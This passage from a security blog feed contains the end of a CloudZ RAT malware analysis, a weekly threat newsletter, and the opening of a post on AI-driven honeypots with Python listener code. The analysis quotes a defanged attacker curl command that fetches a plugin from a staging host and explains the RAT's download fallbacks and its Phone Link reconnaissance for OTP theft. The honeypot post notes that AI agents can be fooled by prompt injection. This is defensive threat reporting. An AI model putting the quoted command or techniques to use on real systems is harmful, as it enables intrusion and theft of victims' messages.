Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr></tbody></table>
<!--kg-card-end: html-->
<p>The RAT&#xA0;employs various methods to download and execute the&#xA0;plugins.&#xA0;The&#xA0;plugin download&#xA0;feature of RAT&#xA0;uses&#xA0;a&#xA0;three-method fallback approach.&#xA0;It first checks for the presence of the curl utility. If found, it&#xA0;attempts&#xA0;to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell, where it first tries to download the file using the&#xA0;<code>Invoke-WebRequest</code>&#xA0;command. If that method also&#xA0;fails,&#xA0;it executes a final&#xA0;method&#xA0;that uses the&#xA0;LOLBin&#x201C;bitsadmin&#x201D; tool to download and save the plugin payloads to the victim machine.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="106" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 11.&#xA0;CloudZ&#x2019;s&#xA0;embedded PowerShell command with three different&#xA0;approaches&#xA0;to&#xA0;download operation. </span></figcaption></figure><p>Talos&#xA0;observed&#xA0;from the telemetry data that the attacker has downloaded and implanted the&#xA0;Pheno&#xA0;plugin through the curl command from the staging server.&#xA0;</p>
<!--kg-card-begin: html-->
<pre>curl -L -o C:\Windows\TEMP\pheno.exe hxxps[://]orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe</pre>
<!--kg-card-end: html-->
<h2 id="pheno-plugin-to-perform-the-phone-link-application-recon">Pheno&#xA0;plugin&#xA0;to perform the Phone Link&#xA0;application&#xA0;recon&#xA0;</h2><p>In this&#xA0;intrusion,&#xA0;Talos&#xA0;observed&#xA0;that the attacker used a plugin called&#xA0;Pheno&#xA0;to&#xA0;perform&#xA0;reconnaissance of the Windows Phone Link application in the victim machine.&#xA0;&#xA0;</p><p>Pheno&#xA0;is designed to detect if a user is currently&#xA0;syncing&#xA0;their mobile device to&#xA0;a&#xA0;Windows&#xA0;machine through&#xA0;the&#xA0;Phone Link&#xA0;application. It scans all running processes for specific keywords&#xA0;such as&#xA0;&quot;YourPhone,&quot; &quot;PhoneExperienceHost,&quot; or &quot;Link to Windows,&quot; and if matches are found, it logs their Process IDs and file paths to the files with the&#xA0;filename&#xA0;&#x201C;phonelink-&lt;COMPUTERNAME&gt;.txt&#x201D;, created in two&#xA0;staging&#xA0;folders such&#xA0;as&#xA0;:&#xA0;</p><ul><li>&#xA0;C:\programdata\Microsoft\feedback\cm&#xA0;</li><li>&#xA0;%TEMP%\Microsoft\feedback\cm&#xA0;</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-077640e8-d93d-4728-b322-af886fe8bd94-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="587" height="494"><figcaption><span style="white-space: pre-wrap;">Figure 11.&#xA0;Pheno&#xA0;recon plugin that&#xA0;monitors&#xA0;an active PC-to-phone bridge through Phone Link application.&#xA0;</span></figcaption></figure><p>After checking Phone Link processes and writing its results,&#xA0;Pheno&#xA0;executes a secondary check that reads back the contents of previously written files and searches the keyword &quot;proxy&quot; in a case-insensitive manner.&#xA0;The plugin conducts this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of &quot;proxy&quot; in the output files, whether generated by&#xA0;a previous&#xA0;execution of the&#xA0;pheno&#xA0;plugin,&#xA0;indicates&#xA0;that the Phone Link session is actively routing traffic through its relay channel.&#xA0;&#xA0;</p><p>When the keyword is detected, the&#xA0;pheno&#xA0;plugin writes &quot;Maybe connected&quot; to its output file in the staging&#xA0;folders,&#xA0;which eventually allows the attacker,&#xA0;with the help of&#xA0;CloudZ&#xA0;RAT,&#xA0;to&#xA0;potentially&#xA0;monitor&#xA0;SMS or OTP&#xA0;requests that&#xA0;appear&#xA0;on the Phone Link application.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="418" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 12.&#xA0;Pheno&#xA0;checking&#xA0;for&#xA0;a&#xA0;previous&#xA0;instance&#xA0;of PC-to-phone bridge through Phone Link application.&#xA0;</span></figcaption></figure><h2 id="coverage">Coverage</h2><p>The following ClamAV signature detects and blocks this threat:&#xA0;</p><ul><li>Win.Packed.Msilheracles-10030690-0&#xA0;</li><li>Win.Trojan.CloudZRAT-10059935-0&#xA0;</li><li>Win.Trojan.CloudZRAT-10059959-0&#xA0;</li></ul><p>The following Snort Rules (SIDs) detect and block this threat:&#xA0;</p><ul><li>Snort&#xA0;2:&#xA0;66409, 66410, 66408&#xA0;</li><li>Snort&#xA0;3:&#xA0;301492, 66408&#xA0;</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of&#xA0;compromise&#xA0;(IOCs)&#xA0;</h2><p>The IOCs for this threat are available at our GitHub repository&#xA0;<a href="https://github.com/Cisco-Talos/IOCs/blob/main/2026/05/cloudz-pheno-infostealer.txt" rel="noreferrer">here</a>.</p>]]></content:encoded></item><item><title><![CDATA[Great responsibility, without great power]]></title><description><![CDATA[In this week’s newsletter, Hazel uses International Superhero Day as a springboard to explore why empathy — rather than just technical prowess — is the most essential, underrated superpower for navigating the human side of cybersecurity.]]></description><link>https://blog.talosintelligence.com/great-responsibility-without-great-power/</link><guid isPermaLink="false">69f351e2d2ad2b00012dcad6</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Thu, 30 Apr 2026 18:00:07 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-4.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-4.jpg" alt="Great responsibility, without great power"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>As&#xA0;I&#x2019;m&#xA0;writing this, today (April 28) is International Superhero Day. If you&#xA0;don&#x2019;t&#xA0;know the origin story behind this,&#xA0;perhaps you&#xA0;would assume that this day was dreamed up by Marvel. And&#x2026; you would be correct.&#xA0;</p><p>However,&#xA0;it&#x2019;s&#xA0;not a pure marketing ploy. It all started in 1995, when colleagues in Marvel asked a group of school children what superpower&#xA0;they&#x2019;d&#xA0;want the most.&#xA0;&#xA0;</p><p>Through the discussion, it became clear that the people in the children&#x2019;s lives were already doing&#xA0;pretty heroic&#xA0;things, without the benefit of Hindsight Lad. (He&#x2019;s&#xA0;a real Marvel invention &#x2014; Carlton&#xA0;LaFroyge&#xA0;&#x2014; whose superpower was to make aggressively obvious observations, delivered too late to matter.&#xA0;I&#x2019;m&#xA0;sure we all have a real-life Carlton&#xA0;LaFroyge&#xA0;in our lives&#x2026; heck, some of us ARE Carlton&#xA0;LaFroyge.)&#xA0;</p><p>Ok, before I get to my next point, I need to take you down the same internet wormhole I just disappeared into. Here are some of the weirdest superpowers ever committed to comic book lore:&#xA0;</p><ol><li>Eye-Scream. His one power is to become ice cream (soft serve, apparently). Not to be confused with another Marvel character, Soft Serve, whose body acts as a portal to an ice cream dimension.&#xA0;</li><li>Doorman. Recently seen sending Josh Gad into the Dark Dimension (where there&#xA0;presumably is&#xA0;no ice cream) in the Marvel TV show &#x201C;WonderMan.&#x201D; Because his body is a door. Man.&#xA0;&#xA0;</li><li>The Wall. Has the ability to turn himself into a brick wall. I would genuinely love this ability during socially awkward networking events.&#xA0;</li></ol><p>Now&#xA0;I&#x2019;m&#xA0;thinking how awesome a character called &#x201C;Internet Wormhole&#x201D; would be. I just looked it up, and such a character&#xA0;doesn&#x2019;t&#xA0;exist yet (call me, Marvel).&#xA0;&#xA0;</p><p>Right,&#xA0;let&#x2019;s&#xA0;get back on topic. Ooh&#x2026; &#x201C;On topic&#x201D; would be another&#xA0;good idea&#xA0;for a super&#x2026; no,&#xA0;Hazel, no.&#xA0;</p><p>Anyway, the children&#x2019;s ability to&#xA0;identify&#xA0;the people closest to them &#x2014; parents, grandparents, teachers, uncles, and aunts &#x2014; as heroes is a comforting thought for me. Having someone&#x2019;s back is more about showing up than anything else. Being there for them when they need it (and when they&#xA0;don&#x2019;t&#xA0;even realise they need it). Helping to make someone&#x2019;s situation a little bit less bad.&#xA0;&#xA0;</p><p>I can think of a few people in my life who have done, and continue to do, exactly that for me, which makes me feel incredibly lucky. And in an industry like cybersecurity, where&#xA0;bad things&#xA0;happen every single day, it matters more than we tend to admit. You need people around you who can steady things, who can sense you need support, who can listen to you, and who can tell you a silly story on a bleak day.&#xA0;</p><p>Empathy&#xA0;doesn&#x2019;t&#xA0;usually get listed as a specific skillset within cybersecurity, but I think I, and many of my Talos colleagues, would agree that&#xA0;it&#x2019;s&#xA0;absolutely essential. Users make decisions for reasons that make sense to them. Attackers take advantage of that. If you&#xA0;can&#x2019;t&#xA0;see both sides of that equation,&#xA0;you&#x2019;re&#xA0;probably not&#xA0;helping as many people as you could.&#xA0;&#xA0;</p><p>I&#x2019;ll&#xA0;end by answering the ultimate question &#x2014; who is the greatest superhero of all time?&#xA0;&#xA0;</p><p>It&#x2019;s&#xA0;obviously Squirrel Girl. She bested&#xA0;Galactus&#xA0;with a cup of tea and a chat. And though my mum has never been in the same room as&#xA0;Galactus, I have no doubt&#xA0;she&#x2019;d&#xA0;handle him in&#xA0;exactly the sameway.&#xA0;</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos is wrapping up Year in Review coverage by giving&#xA0;<a href="https://blog.talosintelligence.com/five-defender-priorities-from-the-talos-year-in-review/" rel="noreferrer noopener"><strong><u>five critical priorities</u></strong></a>&#xA0;to help defenders navigate an increasingly automated threat landscape. While AI and readily available exploit code have drastically lowered the barrier to entry for threat actors, these adversaries still rely on predictable patterns. Identity infrastructure, exposed legacy systems, and platforms that broker trust&#xA0;remain&#xA0;the primary battlegrounds.&#xA0;Ultimately, even&#xA0;the fastest automated attacks generate anomalous behavior that stands out from normal user activity.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>The speed at which attackers weaponize vulnerabilities and target identity systems &#x2014; highlighted by a 178 percent spike in device compromise &#x2014; can feel overwhelming. But there is&#xA0;a silver lining&#xA0;for security teams. Because adversaries inevitably reuse infrastructure and&#xA0;fail to&#xA0;mimic legitimate user behavior, defenders&#xA0;maintain&#xA0;a distinct advantage if they know exactly where to look.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Security teams need to focus on what they can control right now by treating identity infrastructure as a top-tier critical asset. Secure your MFA workflows with strict verification and build baseline detections around what users&#xA0;actually do&#xA0;after they log in. Prioritize patching vulnerabilities based on internet exposure rather than only severity&#xA0;scores, and&#xA0;actively hunt down the long tail of legacy risks hiding in your network. Finally, apply enhanced monitoring to management-plane systems and focus your detection efforts on anomalous events to cut through the noise of alert fatigue.&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Home security giant ADT data breach affects</strong>&#xA0;<strong>5.5 million people</strong>&#xA0;<br>The extortion group told&#xA0;BleepingComputer&#xA0;that they had allegedly breached the company after compromising an employee&apos;s Okta single sign-on (SSO) account in a voice phishing (vishing) attack.&#xA0;(<a href="https://www.bleepingcomputer.com/news/security/home-security-giant-adt-data-breach-affects-55-million-people/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>U.S. companies hit with record fines for privacy in 2025</strong>&#xA0;<br>The increase is driven in part by stronger, more established privacy laws in states like California, new interstate partnerships built around enforcing laws across state lines, and a renewed focus&#xA0;to&#xA0;how AI and automation affect privacy. (<a href="https://cyberscoop.com/privacy-companies-hit-with-record-fines-2025-gartner/" rel="noreferrer noopener"><u>CyberScoop</u></a>)&#xA0;</p><p><strong>PyPI</strong>&#xA0;<strong>package with 1.1M monthly downloads hacked to push infostealer</strong>&#xA0;<br>The dangerous release is 0.23.3, and it extended to the Docker image due to the&#xA0;package&apos;s&#xA0;workflow that creates the image from the code and uploads it to a container registry for deployment. (<a href="https://www.bleepingcomputer.com/news/security/pypi-package-with-11m-monthly-downloads-hacked-to-push-infostealer/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>LiteLLM</strong>&#xA0;<strong>CVE-2026-42208 SQL injection exploited within 36 hours of disclosure</strong>&#xA0;<br>A newly disclosed critical security flaw in&#xA0;BerriAI&apos;s&#xA0;LiteLLM&#xA0;Python package has come under active exploitation in the wild within&#xA0;36 hours&#xA0;of the bug becoming public knowledge.&#xA0;(<a href="https://thehackernews.com/2026/04/litellm-cve-2026-42208-sql-injection.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>Feuding ransomware groups leak each other&apos;s data</strong>&#xA0;<br>In response to its data leaking,&#xA0;KryBit&#xA0;breached and exfiltrated 0APT&apos;s infrastructure, listed the latter as a victim, and left a message on 0APT&apos;s leak site: &quot;Next time, don&apos;t play with the big boys.&quot; (<a href="https://www.darkreading.com/threat-intelligence/feuding-ransomware-groups-leak-data" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/ai-powered-honeypots-turning-the-tables-on-malicious-ai-agents/" rel="noreferrer noopener"><strong><u>AI-powered honeypots: Turning the tables on malicious AI agents</u></strong></a>&#xA0;<br>Because AI systems generate plausible responses&#xA0;within&#xA0;a given&#xA0;context&#xA0;and set of&#xA0;inputs, they can be tricked into responding&#xA0;inappropriately through prompt injection or into interacting with systems that are not what they appear to be.&#xA0;This Tool Talk&#xA0;shows how&#xA0;generative AI can be used to rapidly deploy adaptive honeypots.&#xA0;</p><p><a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><strong><u>Talos IR Trends Q1 2026: Phishing reemerges</u></strong></a>&#xA0;<br>Phishing is back as the top&#xA0;initial&#xA0;access vector for attackers targeting the health care and public administration sectors. We did not&#xA0;observe&#xA0;any ransomware deployment thanks to early and swift mitigation from Talos IR.&#xA0;</p><p><a href="https://www.buzzsprout.com/2033817/episodes/19097848" rel="noreferrer noopener"><strong><u>25 years of uninterrupted persistence</u></strong></a>&#xA0;<br>Hazel,&#xA0;Dave,&#xA0;and Joe&#xA0;cover&#xA0;Bill&#x2019;s 25 years at Talos&#xA0;and&#xA0;the&#xA0;latest security headlines, including AI-assisted vulnerability research, and why attackers still&#xA0;can&#x2019;t&#xA0;resist abusing trusted systems (or Roblox).&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename:VID001.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</strong>&#xA0;&#xA0;<br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;content.js&#xA0;&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p><p><strong>SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</strong>&#xA0;&#xA0;<br>MD5: dbd8dbecaa80795c135137d69921fdba&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</u></a>&#xA0;&#xA0;<br>Example&#xA0;Filename:&#xA0;u992574.dll&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Variant:MalwareXgenMisc.29d4.1201&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[AI-powered honeypots: Turning the tables on malicious AI agents]]></title><description><![CDATA[Just as AI brings time-saving advantages to our lives, it brings similar advantages to threat actors. We can take the advantage back. This blog shows how generative AI can be used to rapidly deploy adaptive honeypot systems.]]></description><link>https://blog.talosintelligence.com/ai-powered-honeypots-turning-the-tables-on-malicious-ai-agents/</link><guid isPermaLink="false">69ef6227d2ad2b00012dca41</guid><category><![CDATA[Tool Talk]]></category><category><![CDATA[AI]]></category><dc:creator><![CDATA[Martin Lee]]></dc:creator><pubDate>Wed, 29 Apr 2026 10:00:42 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/tool_talk.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT)&#xA0;devices, using&#xA0;simple text&#xA0;prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods.&#xA0;</li><li>AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might otherwise overwhelm human teams.&#xA0;</li><li>This method shifts the strategy from merely detecting attacks to actively manipulating and misleading threat actors. Organizations can safely&#xA0;observe&#xA0;attacker methodologies in real-time within a controlled &quot;hall of mirrors.&quot;&#xA0;</li><li>Ultimately, by&#xA0;exploiting the inherent lack of awareness in AI agents, defenders can level the playing field and turn an attacker&apos;s automation into a liability.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/tool_talk.jpg" alt="AI-powered honeypots: Turning the tables on malicious AI agents"><p>Just as AI brings time-saving advantages to our lives, it&#xA0;brings similar advantages to threat actors. The laborious,&#xA0;time-consuming&#xA0;tasks of finding potentially vulnerable systems,&#xA0;identifying&#xA0;their vulnerabilities, and executing exploit code can be automated and orchestrated using AI.&#xA0;</p><p>Clearly, these&#xA0;new capabilities put defenders at a disadvantage,&#xA0;as they expose&#xA0;new vulnerabilities for the threat actor. Attackers seek to minimize exposure.&#xA0;The more that a defender knows about a potential attack, the better they can prepare to repel or detect an attack.&#xA0;Using AI-orchestrated tooling to gain access to systems trades stealth for capability. That trade-off increases attacker visibility, and increased visibility is something defenders can exploit.</p><p>AI systems do not&#xA0;possess&#xA0;awareness. They&#xA0;generate plausible responses&#xA0;within&#xA0;a given&#xA0;context&#xA0;and set of&#xA0;inputs. As such they can be tricked or fooled into responding&#xA0;inappropriately through prompt injection or into interacting with systems that are not what they appear to be.&#xA0;</p><p>Honeypot systems have long been&#xA0;deployed&#xA0;as a method for gathering information about malicious activities.&#xA0;There are many software&#xA0;projects providing&#xA0;honeypots&#xA0;which can be installed and configured. However, the advent of generative AI systems provides us with the possibility to use AI to masquerade as vulnerable systems and&#xA0;allowing them to be deployed widely and with minimal effort.&#xA0;</p><p>In this post, I show how generative AI can be used to rapidly deploy adaptive honeypot systems.&#xA0;</p><h2 id="getting-started">Getting started</h2><p>The implementation consists of three components:&#xA0;a listener that will accept network connections, a&#xA0;simulated&#xA0;vulnerability that will grant access to the attacker&#xA0;once triggered, and an AI framework that will respond to the attacker&#x2019;s instructions.&#xA0;</p><p>The listener opens a TCP port, accepts incoming connections, and forwards traffic&#xA0;to&#xA0;<code>handle_client</code>. I set HOST to be &#x201C;0.0.0.0&#x201D; to accept any incoming connections to any local IPv4 addresses that my device is assigned.</p>
<!--kg-card-begin: html-->
<pre>def start_server(): 
    &quot;&quot;&quot;Starts the TCP server.&quot;&quot;&quot; 
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
    server.bind((HOST, PORT))  
    server.listen(3) # max number of concurrent connections 
    print(f&quot;[*] Listening on {HOST}:{PORT}&quot;) 
 
    while True: 
        try: 
            conn, addr = server.accept()  
            client_handler = threading.Thread(target=handle_client, args=(conn, addr,)) 
            client_handler.start() 
        except KeyboardInterrupt: 
            print(&quot;\n[*] Shutting down server...&quot;) 
            break 
        except Exception as e: 
            print(f&quot;[-] Server error: {e}&quot;) 
             
    server.close() 
 
if __name__ == &quot;__main__&quot;: 
    start_server()</pre>
<!--kg-card-end: html-->
<p>Within&#xA0;<code>handle_client</code>&#xA0;I have created&#xA0;a very basic&#xA0;vulnerability that must be exploited before further access is granted.&#xA0;In this case, the attacker must supply the username&#xA0;&#x201C;admin&#x201D;with the password&#xA0;&#x201C;password123&#x201D;&#xA0;before they are authenticated.</p><p>The nature of the vulnerability need not be this simple.&#xA0;We could respond only to attempts to exploit Shellshock (CVE-2014-6271) or masquerade as a&#xA0;web&#xA0;shell&#xA0;that is only activated in response to&#xA0;<a href="https://attack.mitre.org/techniques/T1205/001/" rel="noreferrer noopener"><u>port knocking</u></a>.</p>
<!--kg-card-begin: html-->
<pre>def handle_client(conn, addr): 
    print(f&quot;[*] Accepted connection from {addr}:{addr}&quot;) 
    # Store conversation history for this client to maintain context  
    conversation_history = [SYSTEM_PROMPT] 
    try: 
        authenticated = False 
      	 while not authenticated: 
            conn.sendall(b&quot;Username: &quot;) 
            username = conn.recv(BUFFER_SIZE).decode(&apos;utf-8&apos;).strip() 
            conn.sendall(b&quot;Password: &quot;) 
            password = conn.recv(BUFFER_SIZE).decode(&apos;utf-8&apos;).strip() 
 
            if username == &quot;admin&quot; and password == &quot;password123&quot;: 
                authenticated = True 
                conn.sendall(b&quot;Authentication successful.\n&quot;) 
                print(f&quot;[*] Client {addr[0]}:{addr[1]} authenticated successfully.&quot;) 
            else: 
                conn.sendall(b&quot;Invalid credentials. Try again.\n&quot;) </pre>
<!--kg-card-end: html-->
<p>The&#xA0;remainder&#xA0;of the&#xA0;<code>handle_client</code>&#xA0;code&#xA0;accepts the attacker&#x2019;s input, forwards it to the ChatGPT instance,&#xA0;and outputs the message and response to the console.</p>
<!--kg-card-begin: html-->
<pre>        while True: 
            conn.sendall(b&apos;&gt;&apos;) 
            data = conn.recv(BUFFER_SIZE) 
            if not data: 
                print(f&quot;[*] Client {addr}:{addr} disconnected.&quot;) 
                break 
 
            command = data.decode(&apos;utf-8&apos;).strip() 
            print(f&quot;[*] Received command from {addr}:{addr}: &apos;{command}&apos;&quot;) 
 
            if command.lower() == &apos;exit&apos;: 
                print(f&quot;[*] Client {addr}:{addr} requested exit.&quot;) 
                break 
            conversation_history.append({&quot;role&quot;: &quot;user&quot;, &quot;content&quot;: command}) 
 
            # Call ChatGPT API 
            try: 
                chat_completion = client.chat.completions.create( 
                    model=MODEL_NAME, 
                    messages=conversation_history, 
                    temperature=0.1, # Keep responses less creative, more factual/direct 
                    max_tokens=500 # Limit response length 
                ) 
                 
                # Extract AI&apos;s response 
                ai_response = chat_completion.choices[0].message.content.strip() 
                print(f&quot;[*] ChatGPT response: &apos;{ai_response}&apos;&quot;) 
                # Append AI&apos;s response to history for continued context 
                conversation_history.append({&quot;role&quot;: &quot;assistant&quot;, &quot;content&quot;: ai_response}) 
                # Send AI&apos;s response back to the client 
                conn.sendall(ai_response.encode(&apos;utf-8&apos;) + b&apos;\n&apos;) 
 
            except Exception as e: 
                error_message = f&quot;Error communicating with ChatGPT: {e}&quot; 
                print(error_message) 
                conn.sendall(error_message.encode(&apos;utf-8&apos;) + b&apos;\n&apos;) 
 
    except ConnectionResetError: 
        print(f&quot;[*] Client {addr}:{addr} forcibly closed the connection.&quot;) 
    except Exception as e: 
        print(f&quot;[-] Error handling client {addr}:{addr}: {e}&quot;) 
    finally: 
        conn.close() 
        print(f&quot;[*] Connection with {addr}:{addr} closed.&quot;) </pre>
<!--kg-card-end: html-->
<p>The key functionality is contained in the instructions to the ChatGPT instance. You must have a valid OpenAI key in order to initiate a ChatGPT instance that will behave as instructed.</p>
<!--kg-card-begin: html-->
<pre>OPENAI_API_KEY = os.getenv(&quot;OPENAI_API_KEY&quot;) # Get API key from environment variable                                       
MODEL_NAME = &quot;gpt-3.5-turbo&quot; 
 
# --- OpenAI Client Initialization --- 
if not OPENAI_API_KEY: 
    print(&quot;Error: OPENAI_API_KEY environment variable not set.&quot;) 
    print(&quot;Please set the environment variable before running the script.&quot;) 
    exit(1) 
 
client = OpenAI(api_key=OPENAI_API_KEY) 
 
# --- System Prompt for Linux Shell Simulation --- 
SYSTEM_PROMPT = { 
